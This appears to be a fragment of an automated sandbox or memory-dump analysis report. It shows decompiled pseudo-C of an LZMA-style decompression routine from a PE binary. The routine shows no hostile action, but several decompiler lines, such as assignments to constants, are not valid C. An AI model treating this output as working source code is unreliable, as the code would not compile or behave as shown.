                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							 *(__ebp - 0x44) = __ebx;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								L59:
                								if(__ebx >= 0x100) {
                									goto L54;
                								}
                								goto L60;
                							} else {
                								L57:
                								if( *(__ebp - 0x6c) == 0) {
                									 *(__ebp - 0x88) = 0xf;
                									goto L170;
                								}
                								__ecx =  *(__ebp - 0x70);
                								__eax =  *(__ebp - 0xc);
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                								_t202 = __ebp - 0x70;
                								 *_t202 =  *(__ebp - 0x70) + 1;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                								goto L59;
                							}
                						} else {
                							__eax =  *(__ebp - 0x14);
                							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                							if(__eax >=  *(__ebp - 0x74)) {
                								__eax = __eax +  *(__ebp - 0x74);
                							}
                							__ecx =  *(__ebp - 8);
                							__ebx = 0;
                							__ebx = 1;
                							__al =  *((intOrPtr*)(__eax + __ecx));
                							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                							L40:
                							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                							__ecx =  *(__ebp - 0x58);
                							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                							 *(__ebp - 0x48) = __eax;
                							__eax = __eax + 1;
                							__eax = __eax << 8;
                							__eax = __eax + __ebx;
                							__esi =  *(__ebp - 0x58) + __eax * 2;
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                							__ax =  *__esi;
                							 *(__ebp - 0x54) = __esi;
                							__edx = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								 *(__ebp - 0x40) = 1;
                								__cx = __ax >> 5;
                								__ebx = __ebx + __ebx + 1;
                								 *__esi = __ax;
                							} else {
                								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edx;
                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							 *(__ebp - 0x44) = __ebx;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								L38:
                								__eax =  *(__ebp - 0x40);
                								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                									while(1) {
                										if(__ebx >= 0x100) {
                											break;
                										}
                										__eax =  *(__ebp - 0x58);
                										__edx = __ebx + __ebx;
                										__ecx =  *(__ebp - 0x10);
                										__esi = __edx + __eax;
                										__ecx =  *(__ebp - 0x10) >> 0xb;
                										__ax =  *__esi;
                										 *(__ebp - 0x54) = __esi;
                										__edi = __ax & 0x0000ffff;
                										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                										if( *(__ebp - 0xc) >= __ecx) {
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                											__cx = __ax;
                											_t169 = __edx + 1; // 0x1
                											__ebx = _t169;
                											__cx = __ax >> 5;
                											 *__esi = __ax;
                										} else {
                											 *(__ebp - 0x10) = __ecx;
                											0x800 = 0x800 - __edi;
                											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                											__ebx = __ebx + __ebx;
                											 *__esi = __cx;
                										}
                										 *(__ebp - 0x44) = __ebx;
                										if( *(__ebp - 0x10) < 0x1000000) {
                											L45:
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xe;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t155 = __ebp - 0x70;
                											 *_t155 =  *(__ebp - 0x70) + 1;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                										}
                									}
                									L53:
                									_t172 = __ebp - 0x34;
                									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                									L54:
                									__al =  *(__ebp - 0x44);
                									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                									L55:
                									if( *(__ebp - 0x64) == 0) {
                										 *(__ebp - 0x88) = 0x1a;
                										goto L170;
                									}
                									__ecx =  *(__ebp - 0x68);
                									__al =  *(__ebp - 0x5c);
                									__edx =  *(__ebp - 8);
                									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                									 *( *(__ebp - 0x68)) = __al;
                									__ecx =  *(__ebp - 0x14);
                									 *(__ecx +  *(__ebp - 8)) = __al;
                									__eax = __ecx + 1;
                									__edx = 0;
                									_t191 = __eax %  *(__ebp - 0x74);
                									__eax = __eax /  *(__ebp - 0x74);
                									__edx = _t191;
                									L79:
                									 *(__ebp - 0x14) = __edx;
                									L80:
                									 *(__ebp - 0x88) = 2;
                									goto L1;
                								}
                								if(__ebx >= 0x100) {
                									goto L53;
                								}
                								goto L40;
                							} else {
                								L36:
                								if( *(__ebp - 0x6c) == 0) {
                									 *(__ebp - 0x88) = 0xd;
                									L170:
                									_t568 = 0x22;
                									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                									_t535 = 0;
                									L172:
                									return _t535;
                								}
                								__ecx =  *(__ebp - 0x70);
                								__eax =  *(__ebp - 0xc);
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                								_t121 = __ebp - 0x70;
                								 *_t121 =  *(__ebp - 0x70) + 1;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                								goto L38;
                							}
                						}
                					}
                					L1:
                					_t534 =  *(_t614 - 0x88);
                					if(_t534 > 0x1c) {
                						L171:
                						_t535 = _t534 | 0xffffffff;
                						goto L172;
                					}
                					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                						case 0:
                							if( *(_t614 - 0x6c) == 0) {
                								goto L170;
                							}
                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                							_t534 =  *( *(_t614 - 0x70));
                							if(_t534 > 0xe1) {
                								goto L171;
                							}
                							_t538 = _t534 & 0x000000ff;
                							_push(0x2d);
                							asm("cdq");
                							_pop(_t570);
                							_push(9);
                							_pop(_t571);
                							_t610 = _t538 / _t570;
                							_t540 = _t538 % _t570 & 0x000000ff;
                							asm("cdq");
                							_t605 = _t540 % _t571 & 0x000000ff;
                							 *(_t614 - 0x3c) = _t605;
                							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                							_t613 = (0x300 << _t605 + _t610) + 0x736;
                							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                								L10:
                								if(_t613 == 0) {
                									L12:
                									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                									goto L15;
                								} else {
                									goto L11;
                								}
                								do {
                									L11:
                									_t613 = _t613 - 1;
                									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                								} while (_t613 != 0);
                								goto L12;
                							}
                							if( *(_t614 - 4) != 0) {
                								GlobalFree( *(_t614 - 4));
                							}
                							_t534 = GlobalAlloc(0x40, 0x600); // executed
                							 *(_t614 - 4) = _t534;
                							if(_t534 == 0) {
                								goto L171;
                							} else {
                								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                								goto L10;
                							}
                						case 1:
                							L13:
                							__eflags =  *(_t614 - 0x6c);
                							if( *(_t614 - 0x6c) == 0) {
                								 *(_t614 - 0x88) = 1;
                								goto L170;
                							}
                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                							_t45 = _t614 - 0x48;
                							 *_t45 =  *(_t614 - 0x48) + 1;
                							__eflags =  *_t45;
                							L15:
                							if( *(_t614 - 0x48) < 4) {
                								goto L13;
                							}
                							_t546 =  *(_t614 - 0x40);
                							if(_t546 ==  *(_t614 - 0x74)) {
                								L20:
                								 *(_t614 - 0x48) = 5;
                								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                								goto L23;
                							}
                							 *(_t614 - 0x74) = _t546;
                							if( *(_t614 - 8) != 0) {
                								GlobalFree( *(_t614 - 8));
                							}
                							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                							 *(_t614 - 8) = _t534;
                							if(_t534 == 0) {
                								goto L171;
                							} else {
                								goto L20;
                							}
                						case 2:
                							L24:
                							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                							 *(_t614 - 0x84) = 6;
                							 *(_t614 - 0x4c) = _t553;
                							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                							goto L132;
                						case 3:
                							L21:
                							__eflags =  *(_t614 - 0x6c);
                							if( *(_t614 - 0x6c) == 0) {
                								 *(_t614 - 0x88) = 3;
                								goto L170;
                							}
                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                							_t67 = _t614 - 0x70;
                							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                							__eflags =  *_t67;
                							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                							L23:
                							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                							if( *(_t614 - 0x48) != 0) {
                								goto L21;
                							}
                							goto L24;
                						case 4:
                							goto L133;
                						case 5:
                							goto L137;
                						case 6:
                							goto L0;
                						case 7:
                							__eflags =  *(__ebp - 0x40) - 1;
                							if( *(__ebp - 0x40) != 1) {
                								__eax =  *(__ebp - 0x24);
                								 *(__ebp - 0x80) = 0x16;
                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                								__eax =  *(__ebp - 0x28);
                								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                								__eax =  *(__ebp - 0x2c);
                								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                								__eax = 0;
                								__eflags =  *(__ebp - 0x38) - 7;
                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                								__al = __al & 0x000000fd;
                								__eax = (__eflags >= 0) - 1 + 0xa;
                								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                								__eax =  *(__ebp - 4);
                								__eax =  *(__ebp - 4) + 0x664;
                								__eflags = __eax;
                								 *(__ebp - 0x58) = __eax;
                								goto L68;
                							}
                							__eax =  *(__ebp - 4);
                							__ecx =  *(__ebp - 0x38);
                							 *(__ebp - 0x84) = 8;
                							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                							goto L132;
                						case 8:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 4);
                								__ecx =  *(__ebp - 0x38);
                								 *(__ebp - 0x84) = 0xa;
                								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                							} else {
                								__eax =  *(__ebp - 0x38);
                								__ecx =  *(__ebp - 4);
                								__eax =  *(__ebp - 0x38) + 0xf;
                								 *(__ebp - 0x84) = 9;
                								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                							}
                							goto L132;
                						case 9:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								goto L89;
                							}
                							__eflags =  *(__ebp - 0x60);
                							if( *(__ebp - 0x60) == 0) {
                								goto L171;
                							}
                							__eax = 0;
                							__eflags =  *(__ebp - 0x38) - 7;
                							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                							__eflags = _t258;
                							0 | _t258 = _t258 + _t258 + 9;
                							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                							goto L75;
                						case 0xa:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 4);
                								__ecx =  *(__ebp - 0x38);
                								 *(__ebp - 0x84) = 0xb;
                								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                								goto L132;
                							}
                							__eax =  *(__ebp - 0x28);
                							goto L88;
                						case 0xb:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__ecx =  *(__ebp - 0x24);
                								__eax =  *(__ebp - 0x20);
                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                							} else {
                								__eax =  *(__ebp - 0x24);
                							}
                							__ecx =  *(__ebp - 0x28);
                							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                							L88:
                							__ecx =  *(__ebp - 0x2c);
                							 *(__ebp - 0x2c) = __eax;
                							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                							L89:
                							__eax =  *(__ebp - 4);
                							 *(__ebp - 0x80) = 0x15;
                							__eax =  *(__ebp - 4) + 0xa68;
                							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                							goto L68;
                						case 0xc:
                							L99:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0xc;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t334 = __ebp - 0x70;
                							 *_t334 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t334;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							__eax =  *(__ebp - 0x2c);
                							goto L101;
                						case 0xd:
                							goto L36;
                						case 0xe:
                							goto L45;
                						case 0xf:
                							goto L57;
                						case 0x10:
                							L109:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0x10;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t365 = __ebp - 0x70;
                							 *_t365 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t365;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							goto L111;
                						case 0x11:
                							L68:
                							__esi =  *(__ebp - 0x58);
                							 *(__ebp - 0x84) = 0x12;
                							goto L132;
                						case 0x12:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 0x58);
                								 *(__ebp - 0x84) = 0x13;
                								__esi =  *(__ebp - 0x58) + 2;
                								goto L132;
                							}
                							__eax =  *(__ebp - 0x4c);
                							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                							__ecx =  *(__ebp - 0x58);
                							__eax =  *(__ebp - 0x4c) << 4;
                							__eflags = __eax;
                							__eax =  *(__ebp - 0x58) + __eax + 4;
                							goto L130;
                						case 0x13:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								_t469 = __ebp - 0x58;
                								 *_t469 =  *(__ebp - 0x58) + 0x204;
                								__eflags =  *_t469;
                								 *(__ebp - 0x30) = 0x10;
                								 *(__ebp - 0x40) = 8;
                								L144:
                								 *(__ebp - 0x7c) = 0x14;
                								goto L145;
                							}
                							__eax =  *(__ebp - 0x4c);
                							__ecx =  *(__ebp - 0x58);
                							__eax =  *(__ebp - 0x4c) << 4;
                							 *(__ebp - 0x30) = 8;
                							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                							L130:
                							 *(__ebp - 0x58) = __eax;
                							 *(__ebp - 0x40) = 3;
                							goto L144;
                						case 0x14:
                							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                							__eax =  *(__ebp - 0x80);
                							goto L140;
                						case 0x15:
                							__eax = 0;
                							__eflags =  *(__ebp - 0x38) - 7;
                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                							__al = __al & 0x000000fd;
                							__eax = (__eflags >= 0) - 1 + 0xb;
                							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                							goto L120;
                						case 0x16:
                							__eax =  *(__ebp - 0x30);
                							__eflags = __eax - 4;
                							if(__eax >= 4) {
                								_push(3);
                								_pop(__eax);
                							}
                							__ecx =  *(__ebp - 4);
                							 *(__ebp - 0x40) = 6;
                							__eax = __eax << 7;
                							 *(__ebp - 0x7c) = 0x19;
                							 *(__ebp - 0x58) = __eax;
                							goto L145;
                						case 0x17:
                							L145:
                							__eax =  *(__ebp - 0x40);
                							 *(__ebp - 0x50) = 1;
                							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                							goto L149;
                						case 0x18:
                							L146:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0x18;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t484 = __ebp - 0x70;
                							 *_t484 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t484;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							L148:
                							_t487 = __ebp - 0x48;
                							 *_t487 =  *(__ebp - 0x48) - 1;
                							__eflags =  *_t487;
                							L149:
                							__eflags =  *(__ebp - 0x48);
                							if( *(__ebp - 0x48) <= 0) {
                								__ecx =  *(__ebp - 0x40);
                								__ebx =  *(__ebp - 0x50);
                								0 = 1;
                								__eax = 1 << __cl;
                								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                								__eax =  *(__ebp - 0x7c);
                								 *(__ebp - 0x44) = __ebx;
                								goto L140;
                							}
                							__eax =  *(__ebp - 0x50);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                							__eax =  *(__ebp - 0x58);
                							__esi = __edx + __eax;
                							 *(__ebp - 0x54) = __esi;
                							__ax =  *__esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                							__eflags =  *(__ebp - 0xc) - __ecx;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								__cx = __ax >> 5;
                								__eax = __eax - __ecx;
                								__edx = __edx + 1;
                								__eflags = __edx;
                								 *__esi = __ax;
                								 *(__ebp - 0x50) = __edx;
                							} else {
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                								 *__esi = __cx;
                							}
                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								goto L148;
                							} else {
                								goto L146;
                							}
                						case 0x19:
                							__eflags = __ebx - 4;
                							if(__ebx < 4) {
                								 *(__ebp - 0x2c) = __ebx;
                								L119:
                								_t393 = __ebp - 0x2c;
                								 *_t393 =  *(__ebp - 0x2c) + 1;
                								__eflags =  *_t393;
                								L120:
                								__eax =  *(__ebp - 0x2c);
                								__eflags = __eax;
                								if(__eax == 0) {
                									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                									goto L170;
                								}
                								__eflags = __eax -  *(__ebp - 0x60);
                								if(__eax >  *(__ebp - 0x60)) {
                									goto L171;
                								}
                								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                								__eax =  *(__ebp - 0x30);
                								_t400 = __ebp - 0x60;
                								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                								__eflags =  *_t400;
                								goto L123;
                							}
                							__ecx = __ebx;
                							__eax = __ebx;
                							__ecx = __ebx >> 1;
                							__eax = __ebx & 0x00000001;
                							__ecx = (__ebx >> 1) - 1;
                							__al = __al | 0x00000002;
                							__eax = (__ebx & 0x00000001) << __cl;
                							__eflags = __ebx - 0xe;
                							 *(__ebp - 0x2c) = __eax;
                							if(__ebx >= 0xe) {
                								__ebx = 0;
                								 *(__ebp - 0x48) = __ecx;
                								L102:
                								__eflags =  *(__ebp - 0x48);
                								if( *(__ebp - 0x48) <= 0) {
                									__eax = __eax + __ebx;
                									 *(__ebp - 0x40) = 4;
                									 *(__ebp - 0x2c) = __eax;
                									__eax =  *(__ebp - 4);
                									__eax =  *(__ebp - 4) + 0x644;
                									__eflags = __eax;
                									L108:
                									__ebx = 0;
                									 *(__ebp - 0x58) = __eax;
                									 *(__ebp - 0x50) = 1;
                									 *(__ebp - 0x44) = 0;
                									 *(__ebp - 0x48) = 0;
                									L112:
                									__eax =  *(__ebp - 0x40);
                									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                										_t391 = __ebp - 0x2c;
                										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                										__eflags =  *_t391;
                										goto L119;
                									}
                									__eax =  *(__ebp - 0x50);
                									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                									__eax =  *(__ebp - 0x58);
                									__esi = __edi + __eax;
                									 *(__ebp - 0x54) = __esi;
                									__ax =  *__esi;
                									__ecx = __ax & 0x0000ffff;
                									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                									__eflags =  *(__ebp - 0xc) - __edx;
                									if( *(__ebp - 0xc) >= __edx) {
                										__ecx = 0;
                										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                										__ecx = 1;
                										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                										__ebx = 1;
                										__ecx =  *(__ebp - 0x48);
                										__ebx = 1 << __cl;
                										__ecx = 1 << __cl;
                										__ebx =  *(__ebp - 0x44);
                										__ebx =  *(__ebp - 0x44) | __ecx;
                										__cx = __ax;
                										__cx = __ax >> 5;
                										__eax = __eax - __ecx;
                										__edi = __edi + 1;
                										__eflags = __edi;
                										 *(__ebp - 0x44) = __ebx;
                										 *__esi = __ax;
                										 *(__ebp - 0x50) = __edi;
                									} else {
                										 *(__ebp - 0x10) = __edx;
                										0x800 = 0x800 - __ecx;
                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                										 *__esi = __dx;
                									}
                									__eflags =  *(__ebp - 0x10) - 0x1000000;
                									if( *(__ebp - 0x10) >= 0x1000000) {
                										L111:
                										_t368 = __ebp - 0x48;
                										 *_t368 =  *(__ebp - 0x48) + 1;
                										__eflags =  *_t368;
                										goto L112;
                									} else {
                										goto L109;
                									}
                								}
                								__ecx =  *(__ebp - 0xc);
                								__ebx = __ebx + __ebx;
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                								 *(__ebp - 0x44) = __ebx;
                								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                									__ecx =  *(__ebp - 0x10);
                									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                									__ebx = __ebx | 0x00000001;
                									__eflags = __ebx;
                									 *(__ebp - 0x44) = __ebx;
                								}
                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                								if( *(__ebp - 0x10) >= 0x1000000) {
                									L101:
                									_t338 = __ebp - 0x48;
                									 *_t338 =  *(__ebp - 0x48) - 1;
                									__eflags =  *_t338;
                									goto L102;
                								} else {
                									goto L99;
                								}
                							}
                							__edx =  *(__ebp - 4);
                							__eax = __eax - __ebx;
                							 *(__ebp - 0x40) = __ecx;
                							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                							goto L108;
                						case 0x1a:
                							goto L55;
                						case 0x1b:
                							L75:
                							__eflags =  *(__ebp - 0x64);
                							if( *(__ebp - 0x64) == 0) {
                								 *(__ebp - 0x88) = 0x1b;
                								goto L170;
                							}
                							__eax =  *(__ebp - 0x14);
                							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                							__eflags = __eax -  *(__ebp - 0x74);
                							if(__eax >=  *(__ebp - 0x74)) {
                								__eax = __eax +  *(__ebp - 0x74);
                								__eflags = __eax;
                							}
                							__edx =  *(__ebp - 8);
                							__cl =  *(__eax + __edx);
                							__eax =  *(__ebp - 0x14);
                							 *(__ebp - 0x5c) = __cl;
                							 *(__eax + __edx) = __cl;
                							__eax = __eax + 1;
                							__edx = 0;
                							_t274 = __eax %  *(__ebp - 0x74);
                							__eax = __eax /  *(__ebp - 0x74);
                							__edx = _t274;
                							__eax =  *(__ebp - 0x68);
                							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                							_t283 = __ebp - 0x64;
                							 *_t283 =  *(__ebp - 0x64) - 1;
                							__eflags =  *_t283;
                							 *( *(__ebp - 0x68)) = __cl;
                							goto L79;
                						case 0x1c:
                							while(1) {
                								L123:
                								__eflags =  *(__ebp - 0x64);
                								if( *(__ebp - 0x64) == 0) {
                									break;
                								}
                								__eax =  *(__ebp - 0x14);
                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                								__eflags = __eax -  *(__ebp - 0x74);
                								if(__eax >=  *(__ebp - 0x74)) {
                									__eax = __eax +  *(__ebp - 0x74);
                									__eflags = __eax;
                								}
                								__edx =  *(__ebp - 8);
                								__cl =  *(__eax + __edx);
                								__eax =  *(__ebp - 0x14);
                								 *(__ebp - 0x5c) = __cl;
                								 *(__eax + __edx) = __cl;
                								__eax = __eax + 1;
                								__edx = 0;
                								_t414 = __eax %  *(__ebp - 0x74);
                								__eax = __eax /  *(__ebp - 0x74);
                								__edx = _t414;
                								__eax =  *(__ebp - 0x68);
                								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                								__eflags =  *(__ebp - 0x30);
                								 *( *(__ebp - 0x68)) = __cl;
                								 *(__ebp - 0x14) = __edx;
                								if( *(__ebp - 0x30) > 0) {
                									continue;
                								} else {
                									goto L80;
                								}
                							}
                							 *(__ebp - 0x88) = 0x1c;
                							goto L170;
                					}
                				}
                			}














                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
